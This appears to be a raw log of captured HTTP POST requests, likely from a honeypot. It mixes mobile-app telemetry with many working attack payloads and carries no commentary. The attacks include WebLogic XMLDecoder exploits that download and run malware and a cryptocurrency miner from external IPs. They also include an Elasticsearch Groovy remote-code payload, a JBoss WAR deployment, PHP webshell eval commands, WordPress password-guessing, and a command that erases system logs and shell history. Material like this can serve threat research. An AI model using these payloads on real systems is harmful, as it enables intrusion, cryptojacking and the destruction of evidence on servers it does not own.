User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 27
Cache-Control: no-cache

log=admin&pwd=jamesatchue77

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 809
Host: x.x.x.x:7001



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

leng=die('Hello, Peppa!');

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1427
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;@echo open 93.174.93.149&gt;ssss.txt&amp;@echo binary&gt;&gt;ssss.txt&amp;@echo get /xdxdxd.exe&gt;&gt;ssss.txt&amp;@echo quit&gt;&gt;ssss.txt&amp;@ftp -s:ssss.txt -v -A&amp;@start xdxdxd.exe -o 213.32.29.143:14444 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

EaZbxo7PYyRxA77hcV9eRkOxby7nph9vINrr1uXNmhq2rj1QO/8uam7OAY8LEXwXp6qCAa60XVTRdcononhwMkmHkhZfZ7C8HKRMMjtHJcVnpbBpc4Gl7PiGRwfITUnflebtqi1aEp9ZfbJ2Ad4+BFQEayaAsKtT1kDzXU8v2EW3gGf7FLNmiJVf5qkN+YnlKjFBL3pKszxNdHIB6BBypMQB+mzYQv1huXkW5585vHcIBUoS2pW5V4r1SK1k+affHvubjYHyNWfPZkVUYwv7A1wWTDUmUyWAbWOsCLBJQMAp0ZNyfWnNdS8Jyke5K1/IwRzbGKiV8kad38JGp9smjsmu6lHLSUO0gQ0PoJyi6N8Ttg9fYin3jusinlgR9Unrp8c0jRjfvFURAiwKn3Pwd1oWOWDNtVJ7qKKRWo3HCOhrhrot0bsw

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

axa=die('Hello, Peppa!');

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Á*4?Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2547
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/System32/taskhostxz.exe&quot;&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/System32/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;cscript.exe C:/Windows/System32/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://behacdn.ksmobile.net/fcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 46

.∂ìÍÕ`i'c
K6ÍoòKÌVcpjBhC*8kSH{\{

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST /web-console/Invoker HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 574
Connection: keep-alive
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36

¨Ìsr.org.jboss.console.remote.RemoteMBeanInvocation‡O£ztÆç˙L
actionNametLjava/lang/String;[paramst[Ljava/lang/Object;[	signaturet[Ljava/lang/String;LtargetObjectNametLjavax/management/ObjectName;xptdeployur[Ljava.lang.Object;êŒXüs)lxp
srjava.net.URLñ%76¸‰rIhashCodeIportL	authorityq~
Lfileq~
Lhostq~
Lprotocolq~
Lrefq~
xpˇˇˇˇˇˇˇˇtjoaomatosf.comt/rnp/jexws3.warq~thttppxur[Ljava.lang.String;≠“VÁÈ{Gxp
tjava.net.URLsrjavax.management.ObjectNameßÎmœxpt!jboss.system:service=MainDeployerx

POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496483941788
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2340

1.056aae48ee0f55ad48a00142f@e77f4dd0e2fdae30dbe89ae5dab79eeb8847698ae95046185f6dbee004792959™
 °îì–3ÕxúÖV€r£H˝áûv∂n(@"Ê°óFvF
B≈j√Åã;≤n\:˙fl7ë›m˜lOL(Ù (eeû<yN~mή…flFÁc|(‚K\å‰ë0∫≈˘e$ˇÁ€HTDa<QÒTù‡πÄ7W¶íŒMg≥˘|™ÃÁ◊CiˇjNœøßsπØÇ2Üa]fiEÈÛs|à´0>≈Uö$=≈w«<=úÓÍ√Ó.¨√˙࢈.‹ÔÔ~è√SzIOD:G2/Œ∆‚Tòâú$NnG˚é:˙˛_¯‹éí8ÄCeœAZƒ—”!~9««!(w;
¬0>üéÁÌ©€π~˘˙à?¡•¡~ü«»HA,N„ò{ñ§ ß
«Ò"z~=Ût⫥Ƈ ?ÖGá¯XÁ”€ì‚˛ÕsS^ºù{
ÎÆ·ß∑£(æ§a¸T¬É
kbfiàé6‘õñq_WplÚÛ‘$É*<‘p¶·W¿…”±éŸT~‰i/“rH´º5ZÉ(Ç“˘ÎÂ~ÎπLu4ŒrGùº£}('Ù¶ßÁÏRÛkcæ-G,Û,s[¢“Ñv√2?°•ül*ÊŸÕÏñˆÀÑf•7‚(9VË~[QéyÌqçÙ&‘g»_/˙¿õù
l∂ñ‹WtÚêÆBvØÜ<sV˘¶¢}îK,[¿=D§é
˜„ñdX •&˙à∑Jà°gñC|≠$ÒjvÙ◊~±UvYME⁄n?ù_∑õ*- ∂
yz~Œ÷≤å4~FDÇ9æ•&˘™UG%qvuíÇ:zN=œˇíÛ¶˙ª¨Ø9g¶DU∑'•-˙ŸNÄ[:∏%£‡Âÿ<…Bdy¶»<ÜUaQl™–òuë>åñEX˘	d?áJΩtfl«ùX»‘”x_
ÜLƒúPÄ<U	‰9ˆ≠∑%÷ØRË“Zø‘'≠¡x…oΩ"7ÊX"jQ@Ö-ÈM»çÊÃÉ9.«úúßéí≤ÃDñv¨}ØkS}¨ÃWÌñ89"à	æä;Z“Øό2V+ı∫’cQ∞LÉÒøv„ó>o*KyÌ«_ª
ëeh-IC=[§‹Rw"Ìw-Cd¯6$s{ÀÉ»’5rø©∂¬™c»eÿ—ºÕÁáÄ+≈=Äï@R´“74…=µûÙQ‚gIFU&“ɸ“O©™5æj
ƒâÊP†/∆≥4•5Û§≥Ô5Lqg\`¨:Ω~	Ö„y±jw5ÌW	Ëéha©’µfÄÖ®z∆<∑ŸTDI†YÌ,5Á|ßH®çç––%Œ¿uGTMxp0ˇ‡òí~È–iqæ¢3¥*¸r"≠ÖˇJõ WóÖÂ
ƒŸ0RpoØqD5[R∫<C6ÃIÉÌ¿ì˙»–è[}ñ≥ı≤à傉/wMK;Æ°_π⁄0«ç‘ÕÍû¥øß1ÕV•Â5LédLÑõ[Ê¡;‰∂T]§æC$Àsá¶z6V_õ¬áh’≠Q[DÂÍh`≠—/„U˘oUÈQm†.Î-@üÙz
çï|«‰aÏPÈ–/x„
ïw¯~+–gàÿÖ®∏lìùNÁ"˜êŸøê˜0∏%)M†Î]»hÂAèTãûB∑BÈ9t(¡XGv€áú˛	ê∞∆çÉûñÆËó0t‡É@ñ÷“|*iØ¥$÷ã‚m†õ-j˜L»Å†Ïˇrz:dÇ͇ŒœB ∏&Qd#
#Mz`SO

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST http://check.proxyradar.com/azenv.php?auth=149297256719&a=PSCMN&i=3168963859&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache

FK0LwtzLMWsmVcZ2SqxY9QSzZjARp29UH54g87wI3OxbabTIz+vWOtqMUHwBrkdyRHFC3qY01ALUz0Kfl8CcvnV+Yiu+xfRDTSNx4jPXdhEE+oT0Mmtrdp1Zo/zbuIxTv7YDlCCFv1tA9f4NQqDzIQNYhugqSVd2sZ3zae/m/EJ6F+tzN8wej06kM3c66eNmw8j8n/2H7hG2sw4bDu0XFSf+7MzwVU4pI8Xo2W+TMtN3jqPKtxcovs/wmQOmIy6G4awwMLCiBWkJPi7yVXATS1voaxloo3k2/8z2CLpK2m5MWtD1JSCmuFtVvr042oGBVJMQguZIeRBuQ/WAzjdwLtjA1pyalmL+E4uWd1+UXpGfMlI=

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1043
Content-Type: multipart/form-data; boundary=XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

617710
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0969227ac9527053ebb0ffdc9d96c2d5
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--XNHsY-7ENf7jVcGsThhZn16D5Tj12hxxWb--


POST /test.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referer: http://x.x.x.x/test.php
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Content-Length: 375
Host: x.x.x.x

123=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7

POST http://apkquery.ksmobile.net/fqexpack HTTP/1.1
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: apkquery.ksmobile.net
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 127

ÜkyRZr
9V_^$k^^
Fyc5«0AÇfl
d¶%ˆ+ÇX
ÚØüäƒÕA[◊1fïnDû8¸x”Å>¢•ãËuƒu* 	A]Œ†¸vúÇA9fZøOÌÊßÕyáá~Ïıå≤óâÍL<`ç˜8!©˜ßç1j

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

3f9
ûÙIπ©
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\VMZ+jOXV[a~rTL[Z>'B6=[S TDBC
rD^U]de
ArW_TJdzDYS^ay
dRVYT+WVAX4|Tc
UN?M]^5,L6UYRh,D]ZH{kXjP^PJ;)AW3,Kf
TjyD^5{5DM'WVZFu?
hQYRImxYNus
Q?IH/'M2'L[>CDBC
rBTR[de
ArW_TJdzDYS^ay
dRVYT+WVASc+N4T
VNd)B	_f|6ET[XnzFYWH{kXj[M>}SX4(3^ZM9pM]UZ2{MQbDM'WVRFu?
aTWYHnpYNus
Q?IH	:$B3;G[4

ZqjNY_cgDCBly@^ZXf|fPVUOexM@A	us
dFWOo,BZZ`,IaSXo}LPXd||L[Z;
P^o{6[WN;qXoTdR\QA5YAusrRDTTHlzG^Q[{kX\rD
s.8&C?VCT=WVRZez|L[Il}GUQ[by`^ZVLepYNHmkb
RNhq
VdpLP5@SXM<q]PZf(
rTDTC8pE
	f-J1[Rd,FUZ5yK`WVPZ dNHm{&\_YMidW
HmkK]=
ZqjNY[dqrWDTPIhzL^R_g}fRYU@edWAPu*cG^TmzD
V3*Q`PKm}A]2k \LS@kA
n,Lh^
PNhpA[U[5pfCq3WAPfe
DrT^PNm~DZSZ{kX\rD
s%
D6'I^)P
ZqjNYZ{k[jW[SAoy@\W\ggTZMZ>jONP[nxiW]QM>p3{W2GP_Rkz@AFu9
rR
@oq\Z^e}KS1@PWO;*L_VZ1(
4BZ2
a5
jOTOH!k`V_WOmdW
HmkK]=
3%%g[W3Q
dWAPeqbQBCrD]V

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 35
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue9999

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive

<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>

POST http://api.vungle.com/api/v4/config HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 84

{"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache

Q6ZXxNyeYqmEzDOLoOPlyFK53Wliq4+rzV/2NNfBAdwUgHVNja7z6Kcyb/JmN45C4sasd7PLxIdaEYnEGmA5gGvR+iwvBBeVXo/w6E67Jg5Cr2QXj+0h6lLKrIHwrzRY196mGYc3TZc3fTpLhKPMy512zB0/dJvrWwKFAa25N51O0a9IhrfLqk8gqltzaYi5DG/Sl1Er84LCyNqYqasj4s8UQlUf9PGkq338C/bIozyYJh3I8+7O286OIoWEiNTEgf5+r7faLCp+rWD3wUvGcGE8RYUStY6k73rl6gjQOlb/2ScMpecYIf2dDqNz4Sznv6AzwRngPAsvBjLmFAlSubMOE9Bs5Y5yG2srh5MlFAO9m5AbrTdS+NYQ9FK7lZp++R06QedHcL9MLzT+DYppz/JpvrDE6Aj4fg+cxNU=

POST http://android.bugly.qq.com/rqd/async HTTP/1.1
wup_version: 3.0
cmd: 840
strategylastUpdateTime: 1490687517000
appVer: 18
prodId: e4696cbcd6
bundleId: com.differencetenderwhite.skirt
secureSessionId: 3d84fc1e7cca44829282b7041cdf97ad_SZ
sdkVer: 2.2.2
platformId: 1
A37: HSPA%2B
A38: HSPA%2B
